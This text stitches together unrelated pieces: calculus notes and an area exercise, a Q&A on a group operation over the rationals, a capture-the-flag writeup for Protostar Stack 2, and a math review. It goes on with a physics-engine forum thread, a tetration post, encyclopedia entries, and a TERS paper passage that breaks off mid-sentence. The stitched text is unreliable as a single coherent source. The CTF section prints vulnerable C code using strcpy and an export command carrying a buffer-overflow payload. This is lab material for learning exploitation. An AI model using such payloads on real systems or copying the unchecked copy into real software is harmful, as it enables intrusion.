(a) If $\sum b_n$ is convergent and $a_n \leq b_n$ for all $n$, then $\sum a_n$ is also convergent.
(b) If $\sum b_n$ is divergent and $a_n \geq b_n$ for all $n$, then $\sum a_n$ is also divergent.

Limit comparison test
(c) If $\lim_{n\to\infty} \frac{a_n}{b_n} = c > 0$ (with $c$ finite), then either both series converge or both diverge.
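A short worked example of the limit comparison test stated in (c) above (a standard illustration, not part of the original notes): take $a_n = \frac{1}{n^2+1}$ and $b_n = \frac{1}{n^2}$. Then
$$\lim_{n\to\infty}\frac{a_n}{b_n} = \lim_{n\to\infty}\frac{n^2}{n^2+1} = 1 > 0,$$
and since $\sum b_n$ is a convergent $p$-series ($p = 2 > 1$), the limit comparison test shows that $\sum \frac{1}{n^2+1}$ converges as well.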
### Problem 2-136

Sketch a graph of the region bounded by the functions f(x) = x², g(x) = −2x + 8, and the x-axis.

1. How could you estimate the area in this region?
2. Using your method, estimate the area of the region.

Graph the functions. Shade the region. Find all relevant intersections: Where does f(x) intersect g(x)? Where does each function cross the x-axis? How many integrals will you need?

The functions intersect at (2, 4). The area should be approximated with rectangles or trapezoids for 0 ≤ x ≤ 2 and added to the area of the triangle for 2 ≤ x ≤ 4.

$\text{Estimates will vary. area }\approx \frac{1}{500}\sum_{n=0}^{999}\Big(\frac{n}{500}\Big)^2+\frac{1}{2}(2)(4)\approx 6.66\text{ units}^2$
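A minimal sketch of the rectangle-plus-triangle estimate described above, in plain Python (the number of rectangles per unit is an arbitrary choice mirroring the sum shown):

```python
def estimate_area(steps_per_unit=500):
    # Left-endpoint rectangles under f(x) = x^2 on 0 <= x <= 2 ...
    dx = 1 / steps_per_unit
    n = 2 * steps_per_unit
    riemann = sum((k * dx) ** 2 for k in range(n)) * dx
    # ... plus the triangle under g(x) = -2x + 8 on 2 <= x <= 4.
    triangle = 0.5 * 2 * 4
    return riemann + triangle

print(round(estimate_area(), 2))  # about 6.66
```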
# Group of rational numbers

The set $\mathbb{Q}_1$ of all rational numbers other than 1 forms a group under the operation $a*b=a+b-ab$. If we consider instead the set $\mathbb{Q}$ of all rational numbers, will $\mathbb{Q}$ form a group under the same operation? It looks like this set satisfies the group axioms under the above operation!

• I don't think I am correct. That's why I posted it. There must be something wrong. – Kangkan Oct 5 '17 at 4:36
• I can not really find a proper question. – Cornman Oct 5 '17 at 4:38
• What's the inverse of $1$? – Lord Shark the Unknown Oct 5 '17 at 4:40
• Incidentally, note that $(1-a) * (1-b) = (1-ab)$ – Hurkyl Oct 5 '17 at 6:23

What is the inverse of $1$ under this group operation? There isn't one: $1 * b = 1+b-b=1$ for any $b$.

Well, now I figured it out. For any element $a$ and its inverse $b$ in $\mathbb{Q}_1$ we must have $a*b=0$, since $0$ is the identity element. This gives $a+b-ab=0$, i.e. $b=a/(a-1)$. So if the set contains $1$, an inverse for it does not exist.

This operation is simply multiplication on $\mathbb{Q}$ under the transformation $\phi:x\mapsto 1-x$. Indeed: $\phi(a)\phi(b)=(1-a)(1-b)=1-(a+b-ab)=\phi(a*b)$. Since $1=\phi(0)$, asking whether we can include $1$ in this group is precisely the same as asking whether we can include $0$ in the multiplicative group of the rationals. Clearly, we cannot.
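A small sanity check of the observations above, using exact rational arithmetic in Python (the sample values are arbitrary; illustrative only):

```python
from fractions import Fraction

def star(a, b):
    # The operation a * b = a + b - ab.
    return a + b - a * b

a, b = Fraction(3, 7), Fraction(-2, 5)
phi = lambda x: 1 - x

# phi(a) * phi(b) (ordinary product) equals phi(a star b),
# so (Q \ {1}, star) is isomorphic to (Q \ {0}, multiplication).
assert phi(a) * phi(b) == phi(star(a, b))

# 1 is absorbing: 1 star b = 1 for every b, so 1 has no inverse.
assert star(Fraction(1), b) == 1

# Inverse of a (for a != 1): b = a / (a - 1), since then a star b = 0.
inv = a / (a - 1)
assert star(a, inv) == 0
print("checks passed")
```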
# Protostar Stack-2 Writeup

Writeup for the Protostar Stack 2 challenge.

# Stack 2

## Source Code

The following is the source code for the Stack 2 challenge (the header names, stripped in the HTML rendering, have been restored here based on the functions the program uses):

```c
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <err.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}
```

## Challenge

In this challenge the value of the environment variable GREENIE is copied into buffer, so we need to set GREENIE to a payload that overflows the buffer and overwrites modified with the value 0x0d0a0d0a. This can be done with an export statement along with a little Python magic:

```
export GREENIE=$(python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'")
```

And Stack 2 is completed.
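A tiny sketch of why the payload bytes appear reversed: on the little-endian x86 target the integer 0x0d0a0d0a is stored least-significant byte first, which Python's struct module makes explicit (illustrative, not part of the original writeup):

```python
import struct

payload = b"A" * 64 + struct.pack("<I", 0x0d0a0d0a)
print(payload[-4:])  # b'\n\r\n\r', i.e. b'\x0a\x0d\x0a\x0d'
```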
## On 2-absorbing primary ideals in commutative rings. (English) Zbl 1308.13001

A. Badawi [Bull. Aust. Math. Soc. 75, No. 3, 417–429 (2007; Zbl 1120.13004)] generalized the concept of prime ideals in commutative rings. According to his definition, a nonzero proper ideal $I$ of a commutative ring $R$ is said to be a $2$-absorbing ideal of $R$ if whenever $a, b, c\in R$ and $abc\in I$, then $ab\in I$ or $ac\in I$ or $bc\in I$. The paper under review is devoted to giving a generalization of $2$-absorbing ideals. A proper ideal $I$ of $R$ is called a $2$-absorbing primary ideal of $R$ if whenever $a, b, c\in R$ and $abc\in I$, then $ab\in I$ or $ac\in \sqrt{I}$ or $bc\in \sqrt{I}$. Among other results, the authors prove that if $I$ is a $2$-absorbing primary ideal of $R$, then $\sqrt{I}$ is a $2$-absorbing ideal of $R$; they also prove that the product and the intersection of $2$-absorbing primary ideals are again $2$-absorbing primary. They give some characterizations of $2$-absorbing primary ideals in Dedekind domains. They also give a number of suitable examples to clarify this class of ideals.

### MSC:

13A15 Ideals and multiplicative ideal theory in commutative rings
13F05 Dedekind, Prüfer, Krull and Mori rings and their generalizations
13G05 Integral domains

Zbl 1120.13004
# Applying Simple Joints To 2D Particles

## Recommended Posts

I've got my particle system nailed down and I wanted to start working on joints. My first plan was to simply make a joint that kept two particles at a set distance apart. My implementation seems logical, but the joint behaves very strangely. I'm using two particles with equal mass, but one always seems to swing around the other during collisions.

```csharp
public override void Update(float dt)
{
    Vector2 d = p1.position - p2.position;

    if (d.LengthSquared() != (length * length))
    {
        //calculate each particle's "influence" on the joint
        float p1Influence = p1.mass;
        float p2Influence = p2.mass;

        //figure out the total "influence" the joint has
        float totalInfluence = p1Influence + p2Influence;

        //get the percentage of influence for both particles.
        //notice the reversal of the particle influence for
        //the percentage. this percentage is the percentage
        //of the correction distance each particle must move.
        //hence the particle with the highest influence has the
        //lowest percentage it must move.
        float p1Percentage = p2Influence / totalInfluence;
        float p2Percentage = p1Influence / totalInfluence;

        //get the correction distance and vector
        float correctionDistance = d.Length() - length;
        Vector2 correctionVector = p1.position - p2.position;
        correctionVector.Normalize();

        //move the particles
        p1.position -= correctionVector * (p1Percentage * correctionDistance);
        p2.position += correctionVector * (p2Percentage * correctionDistance);
    }
}
```

##### Share on other sites

How are you handling the velocity change?

##### Share on other sites

Quote: Original post by Cowboy Coder
How are you handling the velocity change?

I totally forgot about that. Thanks. I'll go back through and try to do it with forces.

##### Share on other sites

So I tried again. I used the f = ma and v = p/t equations to arrive at the equation f = pm/t² (t squared). Using this, I applied it to my joint update method:

```csharp
public override void Update(float dt)
{
    Vector2 d = p1.position - p2.position;

    if (d.LengthSquared() != (length * length))
    {
        //calculate each particle's "influence" on the joint
        float p1Influence = p1.mass;
        float p2Influence = p2.mass;

        //figure out the total "influence" the joint has
        float totalInfluence = p1Influence + p2Influence;

        //get the percentage of influence for both particles.
        //notice the reversal of the particle influence for
        //the percentage. this percentage is the percentage
        //of the correction distance each particle must move.
        //hence the particle with the highest influence has the
        //lowest percentage it must move.
        float p1Percentage = p2Influence / totalInfluence;
        float p2Percentage = p1Influence / totalInfluence;

        //get the correction distance and vector
        float correctionDistance = d.Length() - length;
        Vector2 correctionVector = p1.position - p2.position;
        correctionVector.Normalize();

        //apply the forces
        p1.ApplyForce(-(correctionVector * (correctionDistance * p1Percentage)) * p1.mass / (dt * dt));
        p2.ApplyForce(correctionVector * (correctionDistance * p2Percentage) * p2.mass / (dt * dt));
    }
}
```

It works to a degree. It looks better than it did before, but my particles now never come to rest and actually appear to shiver. In my main physics code, I do a loop three times that first updates all the particles, checks for terrain collision, and then handles the joint problems. Any ideas where I'm going wrong?
Edit: I've combined my methods and compensated for the fact that this is called three times per frame by making the last part into this:

```csharp
p1.position -= correctionVector * (p1Percentage * correctionDistance);
p2.position += correctionVector * (p2Percentage * correctionDistance);

p1.ApplyForce(-(correctionVector * (correctionDistance * p1Percentage)) * p1.mass / (dt * dt) / 3f);
p2.ApplyForce(correctionVector * (correctionDistance * p2Percentage) * p2.mass / (dt * dt) / 3f);
```

So now my joints act correctly, but they still never seem to want to completely come to rest. I thought about using a velocity cutoff in my particles, but I couldn't implement it properly. My particles usually reach a point where they are (visually) at rest, but when I use joints, I can clearly see them shivering.

[Edited by - NickGravelyn on March 19, 2007 5:39:08 PM]

##### Share on other sites

Well, `if (d.LengthSquared() != (length * length))` is never going to be false, so they are never going to settle. You need some kind of epsilon range if you want them to actually stop.

You might also want to look at verlet integration for this kind of thing. For example, see my blob code.
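A minimal sketch of the position-based distance constraint that the Verlet suggestion above leads to, written in Python rather than the thread's C# for brevity; the names and iteration count are illustrative:

```python
def satisfy_distance(p1, p2, rest_length, iterations=3):
    """Move two equal-mass particles so they sit rest_length apart.

    p1 and p2 are [x, y] lists updated in place. With Verlet integration,
    velocity is implicit in (position - old_position), so correcting
    positions alone is enough and the pair settles instead of jittering.
    """
    for _ in range(iterations):
        dx = p2[0] - p1[0]
        dy = p2[1] - p1[1]
        dist = (dx * dx + dy * dy) ** 0.5
        if dist < 1e-9:
            continue
        # Each particle absorbs half of the correction (equal masses).
        diff = (dist - rest_length) / dist
        p1[0] += dx * 0.5 * diff
        p1[1] += dy * 0.5 * diff
        p2[0] -= dx * 0.5 * diff
        p2[1] -= dy * 0.5 * diff

a, b = [0.0, 0.0], [3.0, 0.0]
satisfy_distance(a, b, 2.0)
print(a, b)  # [0.5, 0.0] and [2.5, 0.0], i.e. exactly 2.0 apart
```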
holomorphic binary operators over naturals; generalized hyper operators

JmsNxn (Long Time Fellow) — 07/19/2012, 11:20 PM (This post was last modified: 07/19/2012, 11:21 PM by JmsNxn.)

Exactly what I was thinking. I was trying to think of functions that grow fast; extremely fast. The first problem is getting convergence. I do think it's possible as well. The main problem was that my function could be broken into a quotient: $\vartheta_n(s) = \frac{\psi(s)}{\psi(n)}$ This was a technique I used to ensure $\vartheta_n(n) = 1$, but I think it backfires now. I'm going to think about possible functions for $\vartheta$. I think it only needs to be double exponential, $e^{-e^t}$, since the series is the logarithm of the hyper operators.

The second problem is seeing if we can recover recursion at natural x and y. I think I have a technique for accessing this. I'll have to think about it. The beauty is that we are dealing with natural numbers, so I'm thinking we'll be able to do some kind of proof by induction. This is difficult to vocalize without strictly going through the process of what I mean, but I'll get to it probably tomorrow. I'm still trying to think hard about convergence.

The third problem is getting a right-hand identity, and proving non-commutativity and non-associativity. Then I'll say I have a solution.
# Error function

In mathematics, the error function is a function associated with the cumulative distribution function of the normal distribution. The definition is

${\displaystyle \operatorname {erf} (x)={\frac {2}{\sqrt {\pi }}}\int _{0}^{x}\exp(-t^{2})dt.\,}$

The complementary error function is defined as

${\displaystyle \operatorname {erfc} (x)=1-\operatorname {erf} (x).\,}$

The probability that a normally distributed random variable X with mean μ and variance σ² is less than or equal to x is

${\displaystyle F(x;\mu ,\sigma )={\frac {1}{2}}\left[1+\operatorname {erf} \left({\frac {x-\mu }{\sigma {\sqrt {2}}}}\right)\right].}$
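A small numeric illustration of the relation above, using the math.erf function from Python's standard library (printed values are approximate):

```python
import math

def normal_cdf(x, mu=0.0, sigma=1.0):
    # F(x; mu, sigma) = (1/2) * [1 + erf((x - mu) / (sigma * sqrt(2)))]
    return 0.5 * (1.0 + math.erf((x - mu) / (sigma * math.sqrt(2.0))))

print(normal_cdf(0.0))             # 0.5
print(round(normal_cdf(1.96), 4))  # about 0.975
```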
### Set of all sets

This article is about the largest set in some set theories. For a proper class, see universe (mathematics). For the meaning in probability theory, see sample space. For the meaning in graph drawing, see universal point set.

In set theory, a universal set is a set which contains all objects, including itself.[1] In set theory as usually formulated, the conception of a set of all sets leads to a paradox. The reason for this lies with Zermelo's axiom of comprehension: for any formula $\varphi(x)$ and set $A$, there exists a set $\{x \in A \mid \varphi(x)\}$ which contains exactly those elements $x$ of $A$ that satisfy $\varphi$. If the universal set $V$ existed and the axiom of comprehension applied to it, then Russell's paradox would arise from $\{x \in V \mid x \not\in x\}$. Generally, for any set $A$ we can prove that $\{x \in A \mid x \not\in x\}$ is not an element of $A$.

A second difficulty is that the power set of the set of all sets would be a subset of the set of all sets, provided that both exist. This conflicts with Cantor's theorem that the power set of any set (whether infinite or not) always has strictly higher cardinality than the set itself.

The idea of a universal set seems intuitively desirable in the Zermelo–Fraenkel set theory, particularly because most versions of this theory do allow the use of quantifiers over all sets (see universal quantifier). This is handled by allowing carefully circumscribed mention of $V$ and similar large collections as proper classes. In theories in which the universe is a proper class, $V \in V$ is not true because proper classes cannot be elements.

## Set theories with a universal set

There are set theories known to be consistent (if the usual set theory is consistent) in which the universal set $V$ does exist (and $V \in V$ is true). In these theories, Zermelo's axiom of comprehension does not hold in general, and the axiom of comprehension of naive set theory is restricted in a different way. The most widely studied set theory with a universal set is Willard Van Orman Quine’s New Foundations. Alonzo Church and Arnold Oberschelp also published work on such set theories. Church speculated that his theory might be extended in a manner consistent with Quine’s,[2] but this is not possible for Oberschelp’s, since in it the singleton function is provably a set,[3] which leads immediately to paradox in New Foundations.[4]

Zermelo–Fraenkel set theory and related set theories, which are based on the idea of the cumulative hierarchy, do not allow for the existence of a universal set.
## Introduction Observations of single molecules in different chemical environments1,2,3,4,5,6,7,8,9,10,11 are enabled via surface-enhanced Raman scattering (SERS) or tip-enhanced Raman spectroscopy (TERS), based on their characteristic spectral “fingerprint”12,13,14,15. In general, SERS provides a larger enhancement factor in single-molecule detection compared to TERS16 which gives access to extremely weak vibrational responses of single molecules17. On the other hand, TERS allows us to probe even individual chemical bonds in a single molecule18,19,20,21 using a strongly localized optical field at the plasmonic nano-tip22,23,24, controlled by scanning probe microscopy approaches16,25. Specifically, these experiments revealed the conformational heterogeneity, intramolecular coupling, vibrational dephasing, and molecular motion of single molecules at cryogenic temperatures under ultrahigh vacuum environments5,18,26,27,28. The extreme experimental conditions are advantageous to reduce rotational and spectral diffusions of single molecules and prevent contamination of tips from a surrounding medium. On the other hand, the cryogenic TERS setup cannot be widely deployed because its configuration is highly complicated and the level of difficulty for experiments is also very high. Moreover, performing single-molecule TERS experiments at room temperature is necessarily required to investigate the molecular functions and interactions with respect to chemical environments, such as temperature and atmospheric condition5,29,30. In particular, understanding the conformational heterogeneity of single molecules in the non-equilibrium state is highly desirable because it can address many fundamental questions regarding the structure and function of many biological systems31,32,33,34,35, such as protein folding36,37 and RNA dynamics38,39,40. Previously, a few TERS groups detected single molecules at room temperature30,41,42, yet only limited molecular properties were characterized due to the rapid structural dynamics of molecules exposed to air. Therefore, a systematic approach for robust single-molecule TERS experiments at room temperature is highly desirable. Here, we present a room-temperature freeze-frame approach for single-molecule TERS. To capture the single molecules, we deposit an atomically thin dielectric capping layer (0.5 nm thick Al2O3) onto the molecules on the metal substrate. The freeze-frame keeps the molecules stable at a single-position with much less molecular motions, and thus enables robust single-molecule level TERS experiments at room temperature. Through this approach, we obtain TERS maps of single-level brilliant cresyl blue (BCB) molecules at room temperature, allowing us to probe the spatial heterogeneity of the single BCB molecules adsorbed on the Au surface. Furthermore, through the quantitative analysis of the measured TERS frequency variation through density functional theory (DFT) calculations, we provide a comprehensive picture of the conformational heterogeneity of single molecules at room temperature. ## Results and discussion ### Pre-characterization for ideal TERS conditions For highly sensitive single-molecule level detection at room temperature, we use bottom-illumination mode TERS, as illustrated in Fig. 1a. As a sample system, BCB molecules were spin-coated on a thin metal film and covered by an Al2O3 capping layer to suppress rotational and spectral diffusion5. 
The capping layer not only provides a freeze-frame for individual molecules, but also protects them from unwanted chemical contamination under ambient conditions, especially by sulfur43 and carbon44 molecules. Moreover, it prevents possible contamination of the Au tip, e.g., adsorption of the probing molecules onto the tip surface that can cause artifact signals, as shown in Fig. 1a (see Supplementary Fig. 1 for more details). It should be also noted that a previous study demonstrated that photobleaching of BCB molecules is significantly reduced under vacuum environment compared to the ambient condition because oxygen in air causes the photodecomposition process30. Hence, the Al2O3 capping layer is beneficial to reduce the photobleaching effect of molecules in our experiment. We used an electrochemically etched Au tip attached to a tuning fork for normal-mode atomic force microscopy (AFM) operation (see Methods for details). Using an oil-immersion lens (NA = 1.30), we obtained a focused excitation beam with a sub-wavelength scale, which can highly reduce the background noise of far-field signals in TERS measurements. Furthermore, in combination with the radially polarized excitation beam, we achieved strong field localization in the normal direction with respect to the sample surface, i.e., a strong out-of-plane excitation field in parallel with the tip axis45. The excitation field, with a wavelength of 632.8 nm, is localized at the nanoscale tip apex, and the induced plasmon response gives rise to the resonance Raman scattering effect with the BCB molecules41. Figure 1b shows the far-field and TERS spectra of BCB molecules measured with linearly and radially polarized excitation beams (see Supplementary Fig. 2 for the plasmon response). With the exposure time of 0.5 s, we hardly observed the far-field Raman response of molecules (black), due to the extremely low Raman scattering cross-section. By contrast, we observed a few distinct Raman modes via the TERS measurements with a linearly polarized excitation (blue). Moreover, through the radially polarized excitation46,47, we observed most of the normal modes with a substantially larger TERS intensity (red) compared to the TERS spectra measured with the linearly polarized excitation. The radially-polarized beam has much larger vertical field component after passing through a high NA objective lens compared to the linearly-polarized beam48. For example, the C-H2 scissoring mode at ~1360 cm−1 is clearly identified in the TERS spectrum measured with the radially polarized light, whereas it is not present in the TERS spectrum measured with the linearly polarized light. ### Optimization of the metal substrate for TERS In bottom-illumination mode TERS, the deposition of flat thin metal films on the coverslip is required to preserve the transparency of the substrate and to avoid SERS and fluorescence signals originating from the metal nano-structures49. To demonstrate the influence of the surface condition of metal films, we performed a control experiment based on Au films fabricated by four different conditions with two control parameters of the cleaning method and the deposition rate (see Supplementary Table 1 for detailed control parameters). From the AFM results of Fig. 1c–e, we verify that the optimal process is required for fabrication of flat metal thin films (see Supplementary Fig. 3 for detailed experiment results). 
Another important parameter for bottom-illumination mode TERS is the metal film thickness, because a sufficiently thick metal film is required to induce strong dipole-dipole interactions between the tip dipole and the mirror dipole of the metal film50. However, the light transmission decreases with increasing metal thickness, which gives rise to a reduced excitation rate and collection efficiency in TERS. To experimentally determine the optimal thickness, we deposited Au films on O2-plasma-cleaned coverslips with a Cr adhesion layer. We prepared six metal films with various thicknesses of 5, 7, 9, 11, 13, and 15 nm. Among these metal substrates, we could not perform TERS experiments with the 15 nm metal film because it was difficult to align the tip apex to the laser focus due to low light transmission. Regarding the 5 and 7 nm metal films, we could barely observe TERS signals from the BCB film because the TERS enhancement factor was too low. Therefore, we performed a control experiment with three different metal substrates, namely with metal thicknesses of t = 9, 11, and 13 nm. To compare the relative TERS intensities of BCB film for these three metal substrates, we obtained the TERS spectra for these substrates with three different Au tips, i.e., each sample was measured using three Au tips. Figure 2a shows a comparison of the measured TERS intensities with respect to the thickness of the metal films. We consider the strongest TERS peak at ~580 cm−1 and determine the relative TERS intensities for different metal films. When we used three different tips for this control experiment, the TERS enhancement factors in each case were different; nevertheless, the metal film with 11 nm thickness yielded the strongest TERS signal for all the tips. Therefore, we normalize the TERS intensity measured for the 11 nm metal film to [0, 1] for all three tips and compare the relative TERS intensities measured for the 9 and 13 nm metal films for each tip, as displayed in Fig. 2a. The black circles indicate the average TERS intensities for the three tips, for each substrate. The TERS intensities of the ~580 cm−1 peak, measured for the 9 nm and 13 nm thick metal films, are ~30% and ~60% lower than that measured for the 11 nm metal film. We then verified the ideal metal film thickness through theoretical approaches. First, we calculated the localized optical field intensity between the Au tip apex and the Au surface with respect to the metal film thickness using finite-difference time-domain (FDTD) simulations under the excitation light source (λ = 632.8 nm) placed below the Au film (see Methods and Supplementary Fig. 4 for details). Figure 2b and c show the simulated $|\mathbf{E}_{z}|^{2}$ distributions for the metal film thicknesses of 9 nm and 11 nm, respectively (see Supplementary Fig. 5 for the $|\mathbf{E}_{x}|^{2}$ and $|\mathbf{E}_{\mathrm{total}}|^{2}$ components). When we set the distance d between the Au tip and Au surface to d = 3 nm (i.e., the expected gap in tuning fork-based AFM), we achieve the maximum excitation rate for TERS, $|\mathbf{E}_{z}|^{2}$ ≈ 400, with the metal thickness of 11 nm.
We subsequently calculate the expected optical signal, $|\mathbf{E}_{z}|^{2} \times T$, where T is the calculated transmittance at λ ~ 657 nm by considering the strongest Raman peak of BCB at ~580 cm−1 (see Supplementary Fig. 6 for details). Figure 2d shows the calculated signal as a function of the metal film thickness in the bottom-illumination geometry. T is calculated with the following formula51:

$$T={\left|\frac{\mathbf{E}(t)}{\mathbf{E}_{0}}\right|}^{2}=e^{-4\pi \kappa t/\lambda},$$ (1)

where $\mathbf{E}_{0}$ and $\mathbf{E}(t)$ are incident and transmitted optical field amplitudes, κ is the extinction coefficient of Au at the given wavelength λ, and t is the thickness of the metal film (see also Supplementary Fig. 7 for the experimentally measured transmittance)52. $|\mathbf{E}_{z}|^{2}$ at each film thickness is obtained from FDTD simulations and multiplied by T, as the light passes through the metal film. $|\mathbf{E}_{z}|^{2} \times T$ is gradually enhanced with an increase in thickness up to t = 11 nm, but interestingly, it starts to decrease from 12 nm. To understand this behavior, we performed the same thickness-dependence simulations for different gaps between the tip and the metal surface (see Supplementary Fig. 8 for simulated results). Through these simulations, we found that the optimal metal film thickness varies slightly depending on the gap; nevertheless, the optimal metal film thickness is ~11–12 nm irrespective of the tip-surface gap (see also Supplementary Fig. 9 for the effect of Al2O3 at the tip-sample junction). Note that a previous study demonstrated that the plasmon resonance from a ~ 12 nm thick Au film gives rise to the largest TERS enhancement for the optical responses at ~ 640 nm53. Through the optimization process, the estimated TERS enhancement factor in our experiment is ~ 2.0 × 10⁵ (see Supplementary Note 1 for details), which is sufficient for single-molecule level Raman scattering detection as discussed in the previous study54.

### Single-molecule level TERS imaging at room temperature

We then performed the hyperspectral TERS imaging of single isolated BCB molecules adsorbed on the optimal metal film (t = 11 nm). First of all, we prepared a low-molecular density sample as described in Methods. Then, the freeze-frame (0.5 nm thick Al2O3) allowed us to stably detect single-molecule responses at room temperature (see Methods for details). Figure 3a and b shows the TERS integrated intensity images of the vibrational modes at ~580 cm−1 (in-plane stretching mode of C and O atoms in the middle of the molecule) and ~1160 cm−1 (in-plane asymmetric stretching mode of O atom), which are only two recognizable TERS peaks of a single or a few BCB molecules, due to the short acquisition time (0.5 s) in our TERS mapping30,41 (see also Supplementary Fig. 10 for the raw images of Fig. 3a and b). In the TERS images of both the ~580 cm−1 and the ~1160 cm−1 modes, the TERS intensity of the detected regions shows a spatial variation even though the responses are detected in similar nanoscale areas. This spatially heterogeneous intensity distribution originates from the difference in the number of probing molecules and/or the molecular orientation on the Au surface.
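Returning to Eq. (1), a minimal numeric sketch of the film-transmittance relation in plain Python; the extinction coefficient used below is an illustrative placeholder, not a value taken from this work:

```python
import math

def transmittance(kappa, thickness_nm, wavelength_nm):
    # T = exp(-4 * pi * kappa * t / lambda), as in Eq. (1).
    return math.exp(-4.0 * math.pi * kappa * thickness_nm / wavelength_nm)

kappa_au = 3.3  # placeholder extinction coefficient for Au near 657 nm
for t in (9, 11, 13):
    print(t, "nm ->", round(transmittance(kappa_au, t, 657.0), 3))
```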
Since the apex size of the electrochemically etched Au tip is larger than ~15 nm, several molecules under the tip can be detected together, which gives rise to a strong TERS response. Alternatively, although some of the observed TERS responses are from single molecules, the Raman scattering cross-section can differ from molecule to molecule due to their orientations and the corresponding TERS selection rule5. Specifically, because the excitation field in our TERS setup has a strong out-of-plane polarization component, the peak-to-peak Raman scattering intensity changes depending on the conformation of a molecule. Hence, the conformational heterogeneity of probed molecules can be best exemplified by the peak intensity ratio of the vibrational modes at ~580 cm−1 (Fig. 3a) and at ~1160 cm−1 (Fig. 3b), as shown in Fig. 3c. Since TERS tip selectively probes the out-of-plane modes with respect to the surface, the peak intensity ratio can be low for multiple molecules in comparison with the single molecules. It should be noted that no structural evidence of single molecules was found in the simultaneously measured AFM topography image (Supplementary Fig. 11). Figure 3d shows time-series TERS spectra at a single spot exhibiting robust signals without spectral fluctuations owing to the freeze-frame effect. From this result, we expect stationary conformation of the molecules in the measurement area of Fig. 3a–c. By contrast, fluctuating TERS spectra with respect to time are observed without the capping layer (see Supplementary Fig. 12 for comparison). From the TERS response corresponding to the nanoscale regions in the TERS image, we can infer the possibility of single-molecule detection; nevertheless, more substantial evidence is needed to verify this possibility. In addition to the aforementioned molecular orientation and the selection rule, the vibrational energy of the normal modes of an adsorbed molecule can change due to coupling with the atoms of the metal surface, leading to peak shift and intensity change signatures4,55,56. Additionally, the peak linewidth should be considered to distinguish the molecular ensembles from the single or a few molecules29. Further, to distinguish the single, a few, or multiple molecules, we also need to consider the spatial distribution in TERS images in addition to spectroscopic information57. Hence, we analyze the spectral properties and spatial distribution of the observed spots in the TERS image to obtain the evidence of single-molecule detection. We classify the observed TERS spots in Fig. 3 into two groups, as shown in Fig. 4a. We surmise that the TERS response in the first group (red circled spots 1–3) was measured from multiple BCB molecules because the TERS signal of both the ~580 cm−1 and the ~1160 cm−1 modes is pronounced, significant TERS peak shift is not observed, and the peaks have generally broad linewidths, as shown in Fig. 4b and c (see also Fig. 3a and b). By contrast, we observe much weaker TERS responses in the second group (blue circled spots 4–9 in Fig. 4a) with a significant peak variation corresponding to ~580 cm−1, as large as ~7.5 cm−1, as shown in Fig. 4d (see Supplementary Fig. 13 for the full spectral range). We then consider the linewidth of each spectrum and spatial distribution in the TERS image to distinguish the single and a few molecules. First of all, we classify the spot 4 as a few molecules. 
Although its TERS intensity is weak with a small spatial distribution, the linewidth is quite broad (7.5 cm−1), comparable to the first group (see Supplementary Table 2 for details). It should be noted that a few molecules can show a broad linewidth, even with double peaks, when the molecules have different conformations (see Supplementary Fig. 14 for details). The remaining five spots (S5-9) show narrow linewidths of ≤6.0 cm−1, which is closer to the spectral resolution in our experiment (see also Supplementary Fig. 12). Hence, we finally classify these spots into the single- or few-molecule group based on the spatial distribution in the TERS image. As can be seen in Fig. 4a, the TERS response of spots S5, S7, and S8 is spatially spread out, which means the signals were obtained from a few molecules. Therefore, from the spatio-spectral analyses, we believe the TERS responses from S6 and S9 possibly originate from single isolated BCB molecules.

### DFT calculation of vibrational modes in different chemical environments

To reveal the possible origins of the observed TERS peak variations, we calculated the normal vibrational modes of a BCB molecule through DFT simulations. Since the BCB molecules are encapsulated using a thin dielectric layer, we presume the spectral diffusion is suppressed, as experimentally demonstrated in Fig. 3d. Based on this assumption, we design two kinds of fixed conformations of a BCB molecule, i.e., horizontal and vertical geometries with respect to the Au (111) surface. Regarding horizontally lying molecules, we additionally consider the position of the BCB molecules (especially the C atoms vibrating with a large amplitude for the ~580 cm−1 mode) with respect to the Au atoms, since the substrate-molecule coupling effect can be slightly changed (see Methods for calculation details). Figure 5a shows the calculated normal modes (colored vertical lines) of a BCB molecule with the measured TERS spectra at spots 4–9 (Fig. 4a and d) for the different chemical environments described in Fig. 5b–d. In the frequency range of 570–590 cm−1, two theoretical vibrational modes (ν1 and ν2) are observed even though only a single peak was experimentally observed due to the limited spectral resolution and inhomogeneous broadening at room temperature. As individual atoms in a BCB molecule involve additional coupling to Au atoms on the surface, the Raman frequencies of the two vibrational modes vary depending on the conformation and the position of the molecule. When the two strongly oscillating C atoms of the molecule (as indicated with black dashed rectangles in Fig. 5b) are closer to the nearest Au atoms (the average atomic distance of the two carbon atoms to the Au atom is 3.7 Å), ν1 is calculated as 575.29 cm−1 with the out-of-plane bending vibration mode of the C atoms and ν2 is calculated as 576.94 cm−1 with the in-plane stretching mode of the C atoms. By contrast, when these C atoms (as indicated with black dashed rectangles in Fig. 5c) are vertically mis-located with a longer atomic distance with respect to the Au atoms (the average atomic distance of the two carbon atoms to the Au atom is 4.2 Å), the Raman frequency of the out-of-plane bending mode of the C atoms is increased to 579.23 cm−1 (ν1 in Fig. 5c). It is likely that the two strongly oscillating C atoms having a shorter atomic distance to the Au atoms (Fig. 5b) experience stronger damping forces than the C atoms located further away from the closest Au atoms (Fig. 5c).
On the other hand, both ν1 and ν2 are significantly increased for a vertically standing molecule (Fig. 5d) due to the lessened molecular coupling with the Au atoms (see Supplementary Fig. 15 for the normal mode of a BCB molecule in the gas phase). From these simulation results, we can deduce that the experimentally observed possible single molecules in S6, and S9 (in Figs. 3 and 4) likely have similar molecular orientations to the illustrations in Fig. 5c. The other chemical or environmental conditions give much less effect to the spectral shift compared to the molecular orientation and coupling (mainly C-Au atoms). The observed molecule in S8 is expected to have same molecular orientation as the molecules in S4, and S5 with the C atoms vertically aligned with respect to the Au atoms, as shown in Fig. 5b. The observed broader linewidth and higher frequency TERS peak at S7 indicate the molecule in S7 is oriented vertically, as displayed in Fig. 5d. Hence, in this work, we experimentally verified the freeze-frame effect using a thin dielectric layer and probed the conformational heterogeneity of possible single molecules at room temperature through highly sensitive TERS imaging and spectral analyses with DFT simulations. We exclude other possible effects of the observed spatial shifts for the following reasons. First, spectral shifts can occur depending upon the chemically distinct states, i.e., protonation and deprotonation, of 